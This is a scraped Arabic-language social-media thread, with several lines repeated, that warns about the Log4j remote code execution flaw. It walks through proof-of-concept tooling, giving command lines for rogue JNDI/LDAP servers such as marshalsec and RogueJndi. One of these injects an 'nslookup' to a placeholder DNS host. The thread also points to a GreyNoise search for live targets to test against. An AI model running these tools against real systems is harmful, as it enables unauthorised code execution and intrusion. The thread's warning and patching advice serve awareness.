ثريد عن ثغرة ال Log4j اللى عامله قلق ومشاكل فى العالم كله واللى من وجهة نظري الشخصيه انها احد اخطر الثغرات اللى ظهرت فى الفتره الاخيره لانها بتضرب ملايين ب RCE وبسهوله جدا
هى شغاله من امبارح ونزل باتش لها الثريد ده تحذير
هشرح طريقة ال POC وال EXPLOIT
هى شغاله من امبارح ونزل باتش لها الثريد ده تحذير
هشرح طريقة ال POC وال EXPLOIT
بصوا يا شباب ال log4j علشان اللى مش عارفه هو مشروع مفتوح المصدر لـ Apache. باستخدام Log4j بيتم التحكم في وجهة إرسال معلومات السجل إلى وحدة التحكم ، والملفات ، ومكونات واجهة المستخدم الرسومية من الاخر كل ال loggs موجوده فيه لانه احد اهم مكونات الجافا
خلينا فى ال poc لها
خلينا فى ال poc لها
امبارح بليل ظهر ثغرة rce قلبت العالم تماما لان ال log4j شغال بيه طوب الارض حرفيا تويتر اباتشي ابل العاب الكترونيه tencet steam baidu didi
كلاود فلير امازون وتيسلا
عد من هنا للصبح مش هنخلص
فى اكتر من طريقة للاكتشاف ظهرت
وكمان اكتر من طريقه لل poc وال exploit
كلاود فلير امازون وتيسلا
عد من هنا للصبح مش هنخلص
فى اكتر من طريقة للاكتشاف ظهرت
وكمان اكتر من طريقه لل poc وال exploit
افضل طريقه للاكتشاف هو برب سكانر اضاف الextention فى ال scanner بتاعه
اللى في الصوره ده شكلها اول ما يكتشفها
هنا شرح اضافتها فى ال active scan ++ بتاع برب سويت 👇👇
github.com
اللى في الصوره ده شكلها اول ما يكتشفها
هنا شرح اضافتها فى ال active scan ++ بتاع برب سويت 👇👇
github.com
اللنك ده dork على موقع greynoise طبعا مطلع عدد بسيط تقدر تعمل تست عليه 👇👇
greynoise.io
نيجي لل poc وده نزل له اكتر من طريقه
اول طريقه من repo بتاعة تول marshalsec
github.com
greynoise.io
نيجي لل poc وده نزل له اكتر من طريقه
اول طريقه من repo بتاعة تول marshalsec
github.com
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.(LDAP|RMI)RefServer <codebase>#<class> [<port>]
الامر زى ما هو فوق وواضح فى الصوره وهنا نفذها على لعبة minecraft وفى الاخر حط امر calc بتاع الالة الحاسبه يعنى واتنفذ فعلا جوا اللعبه عن طريق ال ldap server
الامر زى ما هو فوق وواضح فى الصوره وهنا نفذها على لعبة minecraft وفى الاخر حط امر calc بتاع الالة الحاسبه يعنى واتنفذ فعلا جوا اللعبه عن طريق ال ldap server
ودي التول التانيه اللى بتعمل ال poc
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
الcommand
وجوه ال repo فى شرح بالصور
github.com
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
الcommand
وجوه ال repo فى شرح بالصور
github.com
الطريقه التالته
java -jar target/RogueJndi-1.1.jar --command "nslookup your_dns_sever.com" --hostname "192.168.1.10"
سريعه وسهله بردو
github.com
java -jar target/RogueJndi-1.1.jar --command "nslookup your_dns_sever.com" --hostname "192.168.1.10"
سريعه وسهله بردو
github.com
نصيحتى لاصحاب المواقع جميعا والشركات فى الوطن العربي
ياريت تعمل فحص سريع وتنزل اخر تحديث لانها من خطورتها اتعمل لها باتش بسرعه جدا
ياريت تعمل فحص سريع وتنزل اخر تحديث لانها من خطورتها اتعمل لها باتش بسرعه جدا
رايت اب كويس بردو بيشرح الطريقه 👇👇👇👇
lunasec.io
lunasec.io
كمان طريقه سهله جدا 👇👇👇
شرح بالفيديو 👇👇👇
youtu.be
youtu.be
جاري تحميل الاقتراحات...